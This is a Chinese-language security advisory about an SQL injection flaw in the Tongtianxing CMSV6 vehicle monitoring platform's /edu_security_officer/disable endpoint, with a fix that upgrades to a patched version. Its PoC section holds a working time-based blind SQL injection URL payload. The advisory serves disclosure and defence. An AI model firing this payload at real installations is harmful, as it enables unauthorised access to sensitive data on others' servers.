漏洞预警 | 通天星CMSV6 SQL注入漏洞

0x00 漏洞编号
  • 暂无

0x01 危险等级
  • 高危
0x02 漏洞概述

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

0x03 漏洞详情
漏洞类型:SQL注入
影响:获取敏感信息
简述:通天星CMSV6车载定位监控平台/edu_security_officer/disable接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。

0x04 影响版本
  • 通天星CMSV6

0x05 POC

{{BaseURL}}/edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%284%29%29%29kOIi%29
https://blog.csdn.net/qq_40550150/article/details/137015766
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布不承担任何法律及连带责任。

0x06 修复建议

目前官方已发布漏洞修复版本,建议用户升级到安全版本
http://www.g-sky.cn/


免责声明:文章内容不代表本站立场,本站不对其内容的真实性、完整性、准确性给予任何担保、暗示和承诺,仅供读者参考,文章版权归原作者所有。如本文内容影响到您的合法权益(内容、图片等),请及时联系本站,我们会及时删除处理。查看原文

为您推荐